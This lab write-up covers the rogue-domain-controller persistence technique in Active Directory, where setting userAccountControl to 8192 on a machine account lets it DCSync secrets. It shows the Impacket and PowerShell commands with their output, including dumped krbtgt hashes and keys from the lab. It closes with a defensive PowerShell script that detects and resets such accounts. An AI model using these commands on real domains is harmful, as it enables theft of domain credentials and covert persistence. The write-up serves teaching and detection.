1. How it works
Create a machine account and set its userAccountControl attribute to 8192 (0x2000, the SERVER_TRUST_ACCOUNT flag). That flag is what marks an account as a domain controller: when it is set, the directory switches the object's primary group to Domain Controllers (RID 516), and that group holds the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights on the domain naming context, so the account can pull secrets through the replication protocol (DCSync). Writing that flag onto an object is not something an ordinary user can do; it needs domain-admin-level rights (the DS-Install-Replica control access right on the domain object). This is therefore a persistence and stealth technique rather than a privilege escalation: the backdoor is a machine account that is never added to any admin group, and whose tells are its UAC value and its primary group.
2. Rogue domain controller attack
First, create the machine account. This step needs only an ordinary domain user (test3 here), because any authenticated user can add up to ms-DS-MachineAccountQuota (10 by default) computer accounts:
(base) ┌──(root㉿Kali)-[~]
└─# /root/.local/bin/addcomputer.py sec.local/test3:"Az123456@" -dc-ip 10.10.4.2 -computer-name cmp3 -computer-pass "Az123456@" -method SAMR -debug
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies
[+] Impacket Library Installation Path: /root/.local/share/uv/tools/impacket/lib/python3.12/site-packages/impacket
[*] Opening domain SEC...
[*] Successfully added machine account cmp3$ with password Az123456@.
Then change the userAccountControl attribute. This is the privileged step; here it is run on a DC as Administrator. The group is never touched directly: setting the flag makes the directory change cmp3$'s primary group to Domain Controllers (RID 516), which is why it appears in the group listing afterwards.
PS C:\Users\Administrator.SEC> $ADComputer = Get-ADComputer -Identity cmp3
PS C:\Users\Administrator.SEC> Set-ADObject -Identity $ADComputer -Replace @{userAccountControl=8192}
PS C:\Users\Administrator.SEC> net group "domain controllers" /domain
Group name Domain Controllers
Comment All domain controllers in the domain
Members
-------------------------------------------------------------------------------
cmp3$ WIN2016-DC2$ WIN2019-DC1$
WIN2019-DC3$
The command completed successfully.
PS C:\Users\Administrator.SEC>
Verification: DCSync the krbtgt secrets with the new machine account (secretsdump uses the DRSUAPI path, i.e. directory replication, as its output shows).
(base) ┌──(root㉿Kali)-[~]
└─# /root/.local/bin/secretsdump.py sec.local/cmp3\$:"Az123456@"@10.10.4.7 -just-dc-user "sec\krbtgt"
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1258230d20deb8fa8c0ee72e014ae813:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:f17ecd5329b2b676b5737a7e40c5cd26337048e048b09663ceef99178afff9d8
krbtgt:aes128-cts-hmac-sha1-96:48387c994c399862ae5ef5a7c86f0c8e
krbtgt:des-cbc-md5:512a436789e32394
[*] Cleaning up...
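The defender's side of the technique above, as an added example that is not part of the original post: a real DC is registered as a domain controller (Get-ADDomainController enumerates the objects that have NTDS Settings), whereas a backdoored account only carries the SERVER_TRUST_ACCOUNT bit and the RID-516 primary group. The script below looks for objects that have one of those markers but are not real DCs, searches event 4742 ("A computer account was changed") for the moment the flag was enabled, and resets the flag back to WORKSTATION_TRUST_ACCOUNT (0x1000, the value an ordinary domain-joined machine has). Function names are mine; the 4742 match relies on the wording of the standard event template ("'Server Trust Account' - Enabled") and requires the "Audit Computer Account Management" subcategory to be enabled on the DC.

```powershell
# Added example (not from the original post): hunt for rogue-DC machine accounts.
Import-Module ActiveDirectory

function Find-RogueDCAccounts {
    # Distinguished names of the computer objects behind the real (writable and read-only) DCs.
    $realDCs = @(Get-ADDomainController -Filter * | ForEach-Object { $_.ComputerObjectDN })

    # LDAP bitwise-AND match (OID 1.2.840.113556.1.4.803) on the 0x2000 bit,
    # or a primary group of Domain Controllers (RID 516). Get-ADObject rather than
    # Get-ADComputer so that non-computer objects with the flag are caught too.
    $filter = '(|(userAccountControl:1.2.840.113556.1.4.803:=8192)(primaryGroupID=516))'
    $suspects = Get-ADObject -LDAPFilter $filter `
        -Properties userAccountControl, primaryGroupID, whenCreated, whenChanged, objectClass

    foreach ($obj in $suspects) {
        if ($realDCs -contains $obj.DistinguishedName) { continue }
        [pscustomobject]@{
            Name           = $obj.Name
            ObjectClass    = $obj.objectClass
            DN             = $obj.DistinguishedName
            UAC            = ('0x{0:X}' -f [int]$obj.userAccountControl)
            PrimaryGroupID = $obj.primaryGroupID
            WhenCreated    = $obj.whenCreated
            WhenChanged    = $obj.whenChanged
        }
    }
}

function Get-ServerTrustFlagChanges {
    param(
        [string]$DomainController = $env:COMPUTERNAME,
        [int]$Days = 7
    )
    # Event 4742 is written on the DC that processed the write, so run this against
    # each DC. The message lists the userAccountControl flags that flipped.
    $since = (Get-Date).AddDays(-$Days)
    Get-WinEvent -ComputerName $DomainController -ErrorAction SilentlyContinue `
        -FilterHashtable @{ LogName = 'Security'; Id = 4742; StartTime = $since } |
        Where-Object { $_.Message -match "'Server Trust Account' - Enabled" } |
        Select-Object TimeCreated, MachineName, Message
}

function Reset-RogueDCAccount {
    param([Parameter(Mandatory)][string]$DistinguishedName)
    # Write WORKSTATION_TRUST_ACCOUNT (0x1000 = 4096) over the flag, mirroring the
    # Set-ADObject call the attacker used, then disable the account pending investigation.
    Set-ADObject -Identity $DistinguishedName -Replace @{ userAccountControl = 0x1000 }
    Disable-ADAccount -Identity $DistinguishedName
}

# Report first; remediate only after confirming the object is not a DC being promoted.
Find-RogueDCAccounts | Format-Table -AutoSize
```

In the lab above the report would list cmp3$ with UAC 0x2000 and primaryGroupID 516 while WIN2016-DC2$, WIN2019-DC1$ and WIN2019-DC3$ are filtered out as genuine DCs. A freshly promoted DC passes through the same state briefly, so treat a hit as something to confirm against change records rather than as proof on its own, and keep the 4742 search in the detection so the "who and when" of the write is preserved even after the flag has been reset.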